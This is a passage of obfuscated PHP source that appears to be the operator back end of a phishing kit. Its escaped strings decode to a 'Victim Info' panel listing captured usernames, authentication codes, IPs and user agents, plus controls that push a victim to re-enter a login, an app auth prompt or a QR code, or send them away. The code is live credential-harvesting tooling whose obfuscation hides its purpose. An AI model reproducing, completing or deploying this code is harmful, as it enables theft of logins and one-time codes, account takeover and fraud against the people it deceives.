9\11\11\x9\11\11\74\163\x70\141\x6e\x3e\x52\x65\161\165\145\163\x74\x20\101\160\160\40\101\165\x74\150\x3c\x2f\163\x70\141\x6e\x3e\12\x9\x9\11\11\11\11\x9\11\11\11\74\57\154\141\x62\145\154\76\xa\x9\11\11\11\11\11\11\x9\x9\74\57\x64\x69\166\76\xa\11\x9\x9\x9\11\11\11\11\74\57\x74\x64\76\12\x9\11\x9\11\x9\11\11\11\74\x74\x64\76\xa\11\x9\11\x9\x9\x9\11\x9\11\x3c\144\x69\x76\40\x63\x6c\x61\x73\x73\x3d\47\146\x6f\162\x6d\55\143\x68\145\x63\x6b\47\x3e\12\11\x9\11\x9\11\11\11\11\11\11\x3c\x6c\141\x62\x65\154\x20\146\x6f\x72\x3d\47\x61\x73\153\143\150\141\162\x73\x72\x61\144\x69\157\x33{$value["\x69\x64"]}\47\40\x63\154\141\x73\x73\x3d\47\x66\x6f\x72\155\55\143\150\x65\x63\x6b\x2d\x6c\x61\x62\145\154\x27\x3e\xa\11\x9\x9\11\11\x9\x9\x9\x9\x9\x9\x3c\x69\x6e\x70\165\x74\x20\164\x79\x70\145\75\x27\x72\x61\x64\x69\157\47\x20\156\141\x6d\145\75\47\x73\x74\x61\164\x75\x73\x27\x20\166\x61\154\165\145\x3d\x27\x31\64\x27\40\x69\x64\75\x27\x61\163\153\x63\x68\141\x72\x73\162\141\x64\x69\157\x33{$value["\151\144"]}\47\40\x6f\156\x63\x6c\151\143\153\75\x27\x73\150\157\167\x66\151\145\x6c\x64\163\50{$value["\x69\144"]}\x29\73\x27\x20\x63\154\x61\x73\x73\75\47\163\164\x61\164\165\163\40\146\x6f\x72\155\55\143\x68\145\x63\153\55\x69\x6e\160\x75\x74\x27\x3e\xa\x9\11\11\x9\11\x9\11\11\11\x9\11\74\x73\160\141\x6e\76\122\x65\x71\165\x65\x73\x74\40\121\122\40\x43\x6f\x64\x65\74\x2f\163\x70\x61\x6e\x3e\xa\11\11\11\x9\x9\11\11\x9\x9\x9\74\57\154\x61\142\145\154\x3e\xa\x9\11\11\11\11\x9\x9\x9\11\x3c\x2f\x64\151\x76\76\12\11\x9\x9\x9\x9\11\11\11\74\57\164\144\76\xa\11\x9\x9\x9\x9\x9\x9\x3c\57\x74\x72\x3e\xa\12\x9\11\11\x9\x9\x9\11\74\164\x72\76\12\x9\x9\x9\11\11\11\x9\11\x3c\164\x64\x3e\12\x9\x9\x9\11\11\11\11\11\x9\x3c\x64\x69\166\40\143\154\141\x73\x73\x3d\47\x66\x6f\162\155\55\x63\x68\x65\x63\x6b\x27\76\12\x9\11\x9\11\x9\11\x9\x9\11\x9\x3c\154\x61\x62\x65\x6c\40\146\157\162\75\47\141\163\x6b\x6c\157\x67\x69\156\162\141\x64\151\157{$value["\x69\144"]}\47\40\x63\x6c\141\163\x73\75\x27\x66\157\x72\x6d\55\143\150\x65\x63\x6b\55\154\x61\x62\145\154\47\76\xa\x9\x9\11\11\x9\x9\11\x9\x9\11\11\74\151\x6e\160\165\x74\x20\164\x79\x70\x65\x3d\47\x72\141\144\x69\157\47\x20\x6e\141\x6d\145\75\x27\x73\164\141\x74\x75\x73\x27\x20\143\x68\145\x63\x6b\145\x64\40\166\141\x6c\165\x65\x3d\47\x35\x30\47\40\151\144\75\x27\141\x73\x6b\x6c\x6f\x67\151\156\162\x61\x64\151\157{$value["\x69\x64"]}\x27\40\x6f\156\143\x6c\151\x63\x6b\x3d\47\163\150\157\167\146\151\x65\x6c\144\163\x28{$value["\x69\144"]}\x29\x3b\47\x20\143\x6c\141\x73\163\x3d\47\163\164\x61\164\165\x73\40\x66\157\162\155\55\143\150\145\x63\153\x2d\x69\156\160\x75\164\x27\76\xa\x9\11\11\11\11\11\x9\11\11\x9\x9\74\163\x70\141\x6e\76\x52\x65\161\165\x65\163\164\x20\154\157\x67\x69\156\40\x61\147\x61\151\156\40\74\x2f\x73\160\141\156\x3e\12\11\x9\x9\11\x9\11\x9\x9\x9\11\x3c\x2f\154\x61\x62\x65\x6c\76\xa\11\11\11\11\x9\11\11\x9\x9\x3c\x2f\x64\x69\166\x3e\12\11\11\11\x9\11\x9\11\11\x3c\x2f\x74\144\76\12\11\x9\x9\11\x9\x9\11\11\x3c\164\x64\x3e\12\x9\x9\x9\11\x9\x9\x9\11\x9\x3c\x64\x69\x76\x20\143\154\x61\163\x73\x3d\x27\146\x6f\x72\x6d\x2d\x63\x68\145\x63\x6b\47\x3e\xa\x9\11\11\x9\11\11\x9\11\11\11\x3c\154\x61\x62\145\154\40\x66\157\x72\75\47\163\x65\x6e\144\141\167\x61\171\162\141\x64\x69\x6f{$value["\151\x64"]}\x27\x20\x63\154\141\163\163\x3d\47\x66\x6f\x72\x6d\55\x63\150\145\x63\x6b\x2d\x6c\141\x62\x65\x6c\47\76\12\11\x9\x9\x9\11\x9\x9\11\11\x9\x9\x3c\x69\156\160\x75\x74\40\164\x79\x70\x65\x3d\47\x72\x61\x64\x69\157\x27\40\x6e\141\x6d\x65\75\47\163\164\141\x74\x75\x73\x27\x20\166\141\154\165\145\75\47\x31\x30\x30\47\x20\x69\x64\x3d\47\x73\145\156\x64\x61\x77\141\x79\x72\141\144\x69\157{$value["\151\144"]}\x27\x20\157\156\143\154\x69\143\153\75\47\x73\150\157\x77\x66\x69\x65\154\144\x73\50{$value["\151\144"]}\51\73\47\x20\143\x6c\141\163\x73\75\x27\x73\164\141\x74\x75\163\40\146\x6f\x72\x6d\55\143\x68\x65\x63\153\55\x69\x6e\x70\165\x74\x27\76\12\11\x9\11\x9\11\x9\x9\11\x9\x9\x9\x3c\x73\x70\141\156\x3e\111\156\x76\x61\x6c\x69\144\54\40\123\x65\156\x64\40\x61\x77\141\x79\x3c\57\x73\160\141\x6e\76\12\11\11\x9\11\x9\x9\x9\11\x9\x9\x3c\x2f\x6c\x61\x62\x65\x6c\76\12\x9\x9\x9\x9\11\x9\11\11\11\74\57\x64\x69\x76\x3e\xa\x9\x9\11\11\x9\x9\11\11\74\x2f\164\144\x3e\12\x9\11\x9\x9\x9\x9\x9\x3c\x2f\164\x72\x3e\xa\x9\11\11\x9\x9\11\11\xa\x9\x9\11\11\11\11\11\74\164\x72\x3e\xa\x9\x9\x9\11\11\x9\x9\x9\74\x74\x64\76\xa\11\x9\11\x9\x9\x9\11\x9\11\74\144\x69\166\x20\143\x6c\141\x73\x73\75\47\x66\x6f\162\155\x2d\x63\x68\145\143\153\x27\x3e\12\11\x9\11\x9\x9\x9\11\11\x9\x9\74\x6c\141\142\145\x6c\40\x66\x6f\162\75\47\x66\x69\156\151\x73\x68\x72\141\144\x69\x6f{$value["\151\x64"]}\x27\x20\x63\x6c\x61\163\163\x3d\47\x66\x6f\x72\155\55\x63\150\145\x63\153\55\154\x61\x62\x65\x6c\x27\76\12\11\11\11\11\x9\11\x9\11\11\x9\x9\x3c\151\156\x70\165\164\x20\164\x79\160\x65\x3d\47\162\x61\144\151\x6f\47\40\156\141\155\145\75\47\x73\164\x61\x74\165\163\x27\40\x76\x61\154\x75\145\75\x27\62\60\47\x20\x69\x64\75\47\x66\151\x6e\x69\x73\x68\162\141\x64\x69\x6f{$value["\151\144"]}\x27\40\157\x6e\x63\154\x69\x63\153\x3d\47\163\150\157\x77\x66\x69\145\154\x64\x73\x28{$value["\x69\144"]}\x29\73\47\40\x63\154\141\163\163\x3d\47\163\x74\141\164\165\163\x20\x66\x6f\x72\x6d\55\x63\x68\x65\143\x6b\55\x69\156\160\165\x74\x27\x3e\xa\x9\11\11\11\11\11\11\11\x9\11\x9\74\x73\160\x61\156\x3e\x46\x69\x6e\x69\163\150\74\57\x73\x70\x61\x6e\76\xa\11\11\x9\x9\11\x9\x9\x9\x9\x9\74\x2f\x6c\x61\x62\145\154\76\12\11\11\x9\x9\x9\x9\x9\x9\x9\x3c\57\x64\x69\x76\76\12\x9\11\11\11\11\11\11\x9\74\57\164\144\x3e\xa\x9\11\x9\11\11\x9\11\74\57\164\x72\76\12\12\x9\11\11\11\x9\x9\x9\12\11\11\x9\11\x9\11\74\57\x74\x62\157\144\x79\x3e\xa\11\x9\11\x9\x9\74\57\x74\x61\x62\154\x65\x3e\xa\x9\x9\11\xa\x9\x9\x9\11\xa\11\11\11\xa\11\x9\x9\11\12\11\11\11\12\x9\x9\x9\x3c\x2f\144\151\166\76\12\11\x9\11\74\41\55\55\40\105\x6e\144\x20\x63\157\x6d\x6d\141\156\144\x73\x20\145\x64\x69\164\40\x2d\x2d\x3e\xa\11\11\11\xa\x9\x9\x9\74\144\x69\166\40\143\154\x61\x73\x73\75\47\x6d\157\x64\x61\154\x2d\146\x6f\x6f\x74\x65\x72\47\40\x73\x74\171\x6c\145\75\47\155\141\162\147\x69\x6e\x2d\164\x6f\160\72\55\x34\x30\x70\x78\x27\x3e\12\x9\11\x9\x9\x3c\142\165\164\164\x6f\x6e\40\164\x79\160\145\x3d\47\142\165\164\x74\157\156\x27\40\143\154\x61\x73\163\75\47\x62\164\x6e\40\142\x74\156\x2d\x73\145\143\157\156\x64\141\x72\171\47\40\157\156\143\154\151\143\153\75\47\143\x6c\x6f\163\x65\x5f\142\164\x6e\x28\x29\x27\x20\76\103\154\x6f\163\145\74\57\142\165\164\x74\157\156\x3e\xa\11\x9\11\11\74\142\x75\x74\x74\157\x6e\x20\151\x64\x3d\x27\x73\x61\166\145\137{$value["\x69\x64"]}\47\40\157\156\143\x6c\151\143\x6b\75\x27\146\157\x72\155\137\x73\x75\142\155\x69\164\50\x74\150\151\x73\x29\x27\40\x74\x79\x70\x65\x3d\47\x62\165\x74\164\157\x6e\x27\x20\143\x6c\141\163\163\75\47\x62\164\156\40\142\164\x6e\55\160\162\x69\x6d\x61\x72\x79\x27\x3e\x53\x61\166\x65\x3c\57\142\165\164\x74\x6f\156\76\12\x9\11\11\x3c\57\x64\151\x76\76\xa\x9\x9\11\x3c\x2f\x64\151\166\76\xa\11\x9\11\x3c\x2f\144\151\x76\x3e\xa\11\11\11\x3c\57\x66\157\x72\155\x3e\12\11\11\x9\x3c\x2f\x64\151\x76\x3e\12\x9\11\11\xa\11\x9\11\x3c\x64\151\x76\x20\x63\x6c\141\163\x73\75\x27\x6d\157\144\141\x6c\40\x66\x61\144\145\47\x20\x69\x64\75\47\x76\x69\x65\167\155\157\x64\x61\x6c\x5f\x75\x73\145\162\x69\144\137{$value["\x69\144"]}\x27\40\x74\x61\x62\x69\156\x64\x65\170\75\x27\55\61\47\40\162\x6f\x6c\x65\x3d\x27\x64\151\141\154\x6f\147\47\x20\163\164\x79\x6c\x65\75\47\x6f\x70\x61\x63\151\x74\171\72\x31\40\41\x69\x6d\160\x6f\x72\164\141\156\x74\73\x64\151\x73\x70\x6c\x61\171\x3a\156\x6f\x6e\x65\x3b\x68\145\151\147\150\x74\72\61\60\x30\45\x3b\x6f\166\145\162\146\154\x6f\x77\72\x73\143\x72\x6f\154\x6c\x3b\x27\40\x61\x72\151\141\x2d\154\x61\x62\x65\x6c\154\145\x64\142\171\75\x27\145\x78\141\155\x70\154\145\x4d\x6f\144\x61\154\x4c\x61\142\145\x6c\47\x20\141\162\151\141\55\x68\151\x64\x64\x65\156\x3d\x27\164\x72\165\x65\47\x3e\12\x9\x9\11\xa\x9\x9\x9\x3c\x66\157\162\155\x20\156\141\155\145\75\47\x63\x6f\x6e\x66\x69\x67\x5f\146\x6f\x72\155\x5f{$value["\x69\x64"]}\47\x20\x69\144\75\x27\143\157\156\x66\x69\x67\137\x66\157\x72\155\137{$value["\x69\144"]}\47\x20\x6d\x65\164\150\157\144\x3d\47\120\117\x53\x54\x27\40\x61\x63\164\151\x6f\156\x3d\47\x27\40\156\157\x76\141\x6c\151\x64\141\x74\145\x3e\xa\x9\11\11\x3c\151\x6e\160\165\164\40\164\x79\x70\145\x3d\x27\150\x69\x64\144\x65\156\47\40\x6e\141\155\x65\75\47\165\x73\x65\x72\151\x64\x27\x20\x76\x61\154\x75\145\75\47{$value["\x69\144"]}\47\x3e\xa\11\x9\11\74\x64\x69\x76\40\x63\154\x61\163\163\x3d\x27\155\157\x64\x61\154\x2d\144\x69\x61\x6c\157\x67\47\x20\162\157\154\145\x3d\47\144\157\x63\165\155\145\156\x74\47\40\163\164\171\154\x65\x3d\x27\x77\151\144\x74\150\x3a\65\x30\x30\x70\x78\47\x3e\xa\x9\11\11\74\x64\151\x76\40\x63\x6c\x61\x73\163\x3d\x27\x6d\157\144\141\154\x2d\x63\x6f\156\164\145\x6e\164\x27\x3e\12\x9\11\x9\x3c\144\x69\x76\40\x63\154\x61\163\163\75\x27\155\157\144\x61\154\x2d\x68\x65\141\144\x65\162\x27\40\163\164\171\154\145\75\47\x62\141\x63\153\147\162\157\165\x6e\x64\55\143\157\154\157\162\x3a\43\x33\64\64\x39\65\x45\x3b\x66\157\x6e\164\x2d\163\151\172\x65\x3a\62\x2e\67\162\145\155\x3b\164\x65\x78\x74\55\141\x6c\x69\x67\156\72\x63\x65\x6e\x74\145\162\x3b\x27\x3e\xa\x9\x9\x9\x9\x3c\150\x35\x20\x63\x6c\141\x73\x73\x3d\47\x6d\157\x64\x61\x6c\55\164\151\164\x6c\x65\x27\40\151\x64\75\x27\145\170\x61\155\160\154\x65\115\157\144\141\x6c\114\x61\x62\145\154\x27\40\163\164\171\x6c\145\75\47\143\x6f\154\157\162\x3a\167\150\151\164\x65\47\76\126\x69\x63\x74\151\x6d\x20\111\156\146\157\x3c\57\150\65\76\xa\11\11\11\11\x3c\x62\165\x74\164\x6f\x6e\x20\x74\x79\160\145\75\x27\x62\x75\x74\x74\x6f\156\47\x20\143\x6c\x61\x73\163\75\x27\143\x6c\x6f\x73\x65\x27\x20\x6f\x6e\143\x6c\x69\143\153\x3d\x27\143\154\x6f\x73\x65\137\x62\164\156\50\x29\x27\40\x20\x61\162\x69\x61\55\x6c\141\142\x65\x6c\75\x27\x43\x6c\157\163\145\47\x3e\12\11\11\11\11\11\74\163\x70\141\156\x20\141\x72\x69\x61\55\150\x69\x64\x64\145\x6e\75\47\164\162\165\145\47\40\163\x74\x79\154\145\x3d\47\143\157\x6c\157\162\x3a\167\150\x69\164\145\x27\76\x26\x74\x69\155\x65\x73\73\74\57\163\x70\x61\156\x3e\xa\x9\x9\11\x9\x3c\57\142\x75\x74\164\157\x6e\x3e\12\11\x9\x9\74\57\x64\151\x76\76\xa\x9\x9\x9\74\x64\151\166\40\x63\x6c\141\x73\163\75\x27\x6d\x6f\144\141\x6c\x2d\x62\157\x64\171\47\76\12\x9\11\x9\xa\x9\x9\x9\74\x64\151\166\40\x63\154\141\163\163\x3d\x27\146\x6f\x72\155\55\147\x72\157\x75\x70\x27\76\12\x9\11\11\74\x62\x72\x3e\xa\x9\11\11\x3c\164\145\x78\164\141\x72\145\141\40\x69\144\x3d\47\164\145\170\x74\x61\162\145\141\146\x69\156\x69\x73\150\x27\40\143\154\x61\x73\x73\x3d\47\146\x6f\162\x6d\x2d\x63\157\156\x74\162\157\154\47\40\x64\151\163\x61\142\x6c\x65\x64\x3d\47\x64\151\163\x61\x62\154\x65\x64\47\40\162\x6f\167\163\75\x27\x31\62\x27\x3e{$data_log}\74\57\x74\145\x78\x74\141\162\x65\141\76\12\11\x9\x9\x3c\x2f\144\x69\166\x3e\xa\11\11\11\12\11\x9\11\xa\11\11\11\xa\11\x9\x9\x3c\x2f\x64\x69\x76\x3e\xa\11\11\11\74\144\151\166\x20\x63\x6c\x61\x73\x73\x3d\47\155\x6f\x64\141\x6c\x2d\x66\x6f\x6f\x74\145\x72\x27\40\x73\x74\x79\x6c\x65\x3d\47\155\x61\x72\147\151\156\55\164\x6f\160\72\55\x34\x30\160\x78\47\x3e\12\x9\x9\x9\x3c\142\165\164\x74\157\156\40\x74\171\160\x65\x3d\x27\x62\165\164\164\x6f\156\x27\x20\x6f\156\143\154\x69\143\x6b\75\47\143\x6c\x6f\163\145\137\142\x74\x6e\50\51\x27\x20\143\154\141\x73\x73\75\47\142\x74\156\x20\142\164\156\x2d\154\147\x20\142\164\156\x2d\x64\x61\162\x6b\x20\143\157\x6c\x2d\x31\62\47\40\x3e\103\114\117\x53\105\x3c\57\x62\x75\x74\164\x6f\156\x3e\xa\11\x9\11\xa\x9\x9\x9\74\x2f\x64\x69\166\76\12\x9\x9\11\74\x2f\x64\x69\x76\x3e\12\x9\x9\x9\x3c\x2f\144\151\x76\x3e\xa\11\11\11\x3c\57\x66\x6f\x72\155\76\xa\x9\x9\x9\x3c\x2f\144\151\166\76\12\x9\11\x9\xa\11\x9\x9\12\11\x9\x9"; } } if (isset($_GET["\x66\145\164\143\150\x5f\x66\151\156\151\163\150\x5f\155\x6f\144\141\x6c\x5f\x64\141\164\x61"])) { $query = mysqli_query($conn, "\x53\x45\x4c\x45\x43\124\40\52\x20\146\x72\x6f\155\x20\143\165\163\x74\157\x6d\145\162\x73"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["\165\163\x72\154\x6f\147\x69\x6e"]; $authcode = $value["\x61\x75\164\150\x63\x6f\144\x65"]; $ip = $value["\151\160"]; $useragent = urldecode($value["\165\x73\145\162\x61\147\145\156\164"]); echo "\xa\11\12\11\x9\x9\x3c\144\x69\x76\x20\x63\x6c\x61\163\163\75\x27\155\x6f\144\x61\154\x20\x66\x61\x64\145\x27\x20\x69\x64\x3d\x27\x76\x69\145\167\x6d\x6f\144\x61\x6c\x5f\165\163\x65\x72\151\144\x5f{$value["\x69\144"]}\47\40\x74\x61\x62\x69\x6e\x64\x65\x78\75\x27\55\61\x27\x20\162\x6f\x6c\145\75\x27\x64\x69\141\154\157\147\47\40\x73\164\x79\x6c\145\x3d\x27\x6f\160\x61\143\151\164\171\x3a\x31\x20\41\x69\x6d\160\157\162\164\141\156\164\73\144\x69\163\x70\154\x61\171\72\156\x6f\156\x65\x3b\x68\x65\x69\147\150\164\72\61\x30\x30\x25\73\x6f\x76\x65\x72\146\x6c\x6f\167\x3a\x73\x63\x72\157\154\x6c\x3b\47\40\x61\162\x69\x61\55\x6c\141\x62\x65\154\154\x65\x64\x62\x79\75\47\145\x78\141\x6d\160\x6c\145\x4d\157\144\x61\154\x4c\141\142\x65\x6c\x27\x20\x61\x72\151\141\55\150\x69\x64\x64\x65\156\x3d\47\x74\x72\165\x65\x27\x3e\xa\x9\x9\11\xa\11\11\11\x9\x3c\x66\157\162\x6d\x20\x6e\x61\x6d\x65\x3d\x27\x63\x6f\156\x66\x69\x67\137\x66\x6f\x72\x6d\x5f{$value["\151\144"]}\x27\x20\x69\x64\75\47\x63\157\156\146\151\147\x5f\x66\157\x72\x6d\137{$value["\x69\144"]}\47\40\x6d\x65\x74\x68\157\144\x3d\47\120\117\x53\124\47\x20\x61\x63\x74\x69\157\x6e\75\x27\x27\40\156\157\x76\141\154\151\144\x61\164\145\76\xa\11\11\11\x9\x3c\x69\156\x70\165\164\x20\x74\x79\160\145\75\x27\x68\x69\144\x64\x65\156\47\40\156\x61\x6d\145\x3d\47\x75\x73\x65\x72\151\x64\47\40\166\x61\x6c\x75\x65\75\47{$value["\151\144"]}\x27\x3e\12\x9\x9\x9\x9\x3c\144\151\x76\x20\x63\154\x61\163\x73\75\47\155\157\x64\141\154\x2d\x64\x69\141\154\157\x67\47\40\162\157\154\145\75\x27\144\157\143\x75\155\x65\156\164\x27\x20\163\164\x79\154\x65\x3d\x27\x6d\x61\162\x67\x69\x6e\55\164\157\160\72\x32\x30\x25\x3b\x6d\x61\x78\55\x77\x69\x64\164\150\x3a\61\60\60\45\x3b\x66\x6f\156\164\55\x73\151\x7a\x65\72\x31\56\62\162\145\x6d\73\x27\x3e\12\x9\11\11\11\74\144\x69\x76\x20\x63\x6c\x61\163\163\75\x27\x6d\x6f\x64\141\x6c\55\x63\157\x6e\x74\145\156\x74\x27\40\x73\x74\x79\154\x65\75\x27\142\141\143\x6b\x67\x72\157\x75\156\144\55\143\x6f\x6c\157\162\x3a\x20\142\x6c\x61\143\x6b\73\x27\x3e\xa\11\x9\11\11\x9\74\x64\x69\x76\40\143\154\141\x73\163\x3d\x27\155\x6f\x64\141\154\x2d\150\145\x61\144\x65\162\47\x20\x73\x74\171\154\145\x3d\47\142\141\143\x6b\147\x72\x6f\x75\156\144\55\143\x6f\x6c\157\x72\x3a\x23\63\x34\64\x39\65\105\73\x66\x6f\156\x74\x2d\x73\151\172\x65\x3a\62\x2e\67\x72\x65\x6d\73\x74\145\x78\x74\x2d\141\x6c\151\x67\156\72\143\145\x6e\164\x65\x72\73\x27\76\12\x9\11\x9\11\x9\74\150\65\40\143\154\x61\163\x73\x3d\x27\x6d\157\x64\141\154\x2d\x74\x69\x74\x6c\145\47\40\x69\x64\75\47\x65\170\141\x6d\160\154\x65\x4d\157\x64\x61\154\114\x61\142\x65\154\x27\x20\x73\164\171\154\x65\75\47\143\157\x6c\x6f\162\72\167\150\151\164\145\73\x66\157\156\164\55\163\x69\172\x65\72\61\x2e\62\162\145\x6d\x27\x3e\101\x64\x6d\x69\x6e\x20\x43\x6f\156\x74\162\x6f\x6c\40\50\x63\154\x69\143\153\40\157\156\x20\x6c\157\x67\x20\164\x6f\40\x61\x75\164\x6f\x2d\x63\157\160\171\51\x3c\57\x68\65\76\12\x9\11\11\11\11\74\x62\x75\164\x74\157\156\x20\164\x79\160\x65\x3d\47\142\165\164\164\157\x6e\47\x20\143\154\x61\x73\163\x3d\47\x63\x6c\x6f\163\145\x27\x20\x6f\156\143\154\x69\143\153\75\x27\143\154\157\x73\145\137\142\164\156\x28\x29\x27\40\40\141\x72\151\141\55\x6c\x61\142\145\x6c\75\x27\103\x6c\157\x73\145\x27\x3e\xa\x9\x9\x9\x9\x9\x9\x3c\x73\x70\141\156\x20\x61\x72\151\141\55\150\x69\144\144\x65\x6e\x3d\x27\164\162\x75\145\47\40\x73\164\171\154\145\x3d\47\x63\157\x6c\x6f\x72\72\x77\150\151\164\145\x27\x3e\x26\164\151\155\x65\163\x3b\74\x2f\163\160\141\x6e\76\xa\x9\x9\11\11\11\x3c\x2f\142\x75\x74\x74\x6f\x6e\x3e\xa\x9\x9\11\11\11\x3c\57\144\151\x76\x3e\12\11\11\11\x9\x9\x3c\144\x69\166\40\x63\x6c\141\163\163\x3d\x27\x6d\x6f\144\x61\154\55\142\157\x64\x79\47\x3e\12\x9\x9\11\12\x9\11\11\11\x9\x3c\144\151\166\x20\143\x6c\141\x73\163\x3d\x27\146\x6f\162\155\55\147\162\x6f\165\160\x27\40\x73\164\171\x6c\145\75\47\x6d\x61\162\147\151\156\55\x62\x6f\x74\164\157\x6d\x3a\61\x72\x65\x6d\x27\76\xa\11\x9\11\x9\11\x9\74\142\162\76\12\11\11\11\11\x9\x9\x3c\143\x65\156\x74\x65\x72\x3e\x3c\151\x6d\147\40\163\x72\143\x3d\47{$filepath}\47\x20\x73\x74\171\x6c\145\x3d\47\x77\x69\144\x74\150\x3a\x37\x30\160\170\x3b\x62\x6f\162\x64\145\162\55\x72\x61\x64\x69\x75\163\72\x31\60\x70\170\47\x20\141\154\x74\x3d\x27\156\157\x20\x69\x6d\141\x67\x65\x20\x74\157\40\144\151\x73\160\x6c\141\x79\x27\x3e\x3c\57\x63\x65\x6e\164\145\162\x3e\xa\11\x9\x9\x9\11\11\x3c\x62\162\x3e\xa\xa\x9\11\x9\11\x9\x9\74\x64\x69\x76\40\x63\x6c\141\163\x73\75\x27\x64\x61\164\x61\x2d\147\x72\157\x75\160\47\76\xa\11\11\11\11\x9\x9\x9\74\x6c\141\142\145\154\40\x63\154\141\x73\163\75\x27\x64\x61\x74\141\55\154\141\x62\x65\154\47\76\x55\x73\x65\162\156\x61\x6d\145\x3c\57\x6c\x61\x62\x65\154\76\12\x9\11\11\x9\x9\x9\x9\x3c\x69\156\160\x75\164\40\157\156\x63\154\151\143\x6b\75\x27\143\x6f\x70\x79\x5f\142\x74\x6e\x28\164\150\151\x73\x29\x27\x20\143\154\x61\163\163\x3d\47\x66\x6f\x72\x6d\55\143\157\156\x74\162\157\154\47\40\x72\145\x61\144\x6f\156\x6c\171\40\166\141\154\165\x65\x3d\47{$usrlogin}\x27\76\xa\x9\x9\x9\11\x9\x9\74\57\x64\151\166\x3e\xa\x9\11\11\x9\x9\11\x3c\144\151\x76\40\143\x6c\141\x73\x73\75\47\x64\141\164\141\55\x67\162\x6f\165\x70\47\76\12\x9\11\x9\11\11\x9\x9\x3c\154\141\x62\145\154\x20\x63\x6c\141\x73\163\x3d\47\x64\141\x74\x61\x2d\x6c\141\x62\145\x6c\x27\x3e\x41\x75\164\150\x20\103\157\x64\145\x3c\57\x6c\141\142\145\154\x3e\12\11\11\x9\11\x9\x9\x9\x3c\151\x6e\160\165\x74\x20\x6f\156\143\x6c\x69\143\x6b\75\x27\143\x6f\160\x79\x5f\x62\164\156\x28\x74\x68\151\x73\51\x27\40\x63\154\x61\x73\163\75\47\x66\157\x72\x6d\55\143\157\x6e\x74\162\157\154\47\40\162\x65\x61\x64\157\156\154\171\40\166\x61\x6c\x75\145\x3d\x27{$authcode}\47\x3e\xa\x9\x9\11\11\11\11\x3c\57\144\x69\x76\76\12\x9\x9\11\11\x9\11\74\x64\x69\x76\40\143\x6c\141\x73\163\x3d\x27\144\x61\164\x61\x2d\x67\x72\157\165\x70\x27\x3e\12\11\11\11\x9\11\x9\11\74\x6c\141\142\145\154\40\x63\154\x61\163\x73\75\47\x64\x61\x74\141\x2d\x6c\141\142\145\x6c\47\x3e\111\120\57\104\x65\166\151\143\x65\74\57\154\141\x62\x65\154\76\12\x9\11\11\11\x9\11\x9\74\x69\x6e\x70\x75\x74\x20\157\156\x63\154\x69\143\x6b\75\x27\143\157\x70\x79\x5f\x62\x74\156\50\164\150\x69\163\x29\x27\40\143\154\x61\163\x73\75\47\x66\157\162\x6d\x2d\143\x6f\156\x74\162\x6f\154\x27\40\x72\145\x61\x64\157\156\154\x79\x20\x76\x61\154\165\x65\75\x27{$ip}\x20\133{$useragent}\x5d\47\x3e\xa\x9\11\11\x9\11\11\74\57\144\x69\166\76\12\11\11\x9\11\x9\x9\x3c\x62\x72\76\12\11\x9\x9\x9\x9\74\57\144\151\x76\76\12\x9\11\x9\x9\x9\12\11\11\x9\11\x9\x3c\41\55\55\x20\105\116\x44\40\55\x2d\x3e\xa\x9\x9\x9\x9\11\12\x9\x9\11\x9\x9\74\x64\x69\166\x20\x63\154\141\x73\163\x3d\47\155\157\144\141\154\55\146\x6f\x6f\164\145\162\47\x20\x73\164\171\154\x65\x3d\47\155\x61\162\147\x69\x6e\x2d\x74\x6f\x70\x3a\55\64\60\160\x78\x27\x3e\12\11\11\11\x9\x9\x3c\x62\165\x74\x74\x6f\x6e\x20\x73\x74\171\154\x65\x3d\x27\143\x6f\154\157\x72\x3a\142\154\x61\143\x6b\x3b\x62\141\x63\153\x67\x72\157\x75\156\x64\x2d\x63\x6f\x6c\157\x72\72\167\x68\x69\x74\145\x27\x20\164\x79\x70\145\x3d\47\142\165\164\x74\157\156\47\40\157\156\x63\x6c\151\x63\153\x3d\47\x63\x6c\157\x73\x65\x5f\x62\x74\156\50\51\x27\40\x63\x6c\x61\163\x73\75\47\142\x74\x6e\x20\x62\x74\x6e\x2d\154\147\40\x62\x74\156\x2d\x64\x61\x72\153\x20\143\x6f\x6c\55\61\x32\x27\x20\76\x43\x4c\x4f\x53\x45\74\x2f\142\165\x74\164\x6f\x6e\x3e\12\x9\x9\11\11\11\xa\x9\11\11\x9\11\x3c\x2f\x64\x69\x76\x3e\12\11\x9\x9\12\11\x9\11\74\x2f\144\151\x76\76\xa\11\11\x9\xa\11\11\11\x3c\x2f\144\151\166\76\xa\11\x9\x9\x3c\57\144\151\x76\x3e\12\11\x9\x9\x3c\x2f\144\x69\166\76\xa\x9\11\x9\74\x2f\x66\157\162\x6d\x3e\xa\x9\x9\x9\74\57\x64\151\x76\x3e\xa\x9\x9\11"; } } if (isset($_GET["\x63\x6f\165\156\x74\x65\x72"])) { $ipFile = "\x2e\56\x2f\x2e\x2e\x2f\154\x6f\x67\163\x2f\x76\151\163\x69\x74\163\56\x74\170\x74"; $activequery = mysqli_query($conn, "\x53\105\x4c\x45\x43\124\x20\x2a\40\106\x52\117\115\x20\x63\x75\x73\x74\157\x6d\x65\x72\163\40\x57\x48\x45\x52\105\x20\163\x74\x61\164\165\163\x20\x3c\62\60"); $completequery = mysqli_query($conn, "\123\105\x4c\105\103\x54\40\52\40\x46\x52\x4f\x4d\40\x63\165\163\164\x6f\155\145\x72\x73\40\x57\110\x45\x52\x45\x20\163\x74\x61\x74\x75\x73\75\x32\x30"); if ($activequery and $completequery) { $userRows = count(file($ipFile)); $activeRows = mysqli_num_rows($activequery); $completeRows = mysqli_num_rows($completequery); $stats = array("\165\x73\x65\162\156\165\155" => $userRows, "\141\x63\164\x69\x76\145\x6e\x75\x6d" => $activeRows, "\x63\x6f\x6d\x70\x6c\145\164\x65\x64\156\165\x6d" => $completeRows); echo json_encode($stats); } else { echo json_encode(array("\163\x74\141\x74\x73" => "\x65\x72\x72\157\x72")); } } if (isset($_GET["\166\x69\163\x69\164\x6c\x6f\147"])) { $ipFile = "\56\56\57\x2e\56\x2f\154\157\x67\x73\x2f\166\x69\x73\x69\x74\x6f\162\x73\56\164\170\164"; $logquery = file_get_contents($ipFile, true); if ($logquery) { $log = array("\166\x69\x73\151\x74\x6f\162\154\157\x67" => $logquery); echo json_encode($log); } else { echo json_encode(array("\x73\164\x61\x74\x73" => "\145\x72\x72\x6f\x72")); } } if (isset($_GET["\x62\165\x7a\x7a\157\146\x66"])) { $query = mysqli_query($conn, 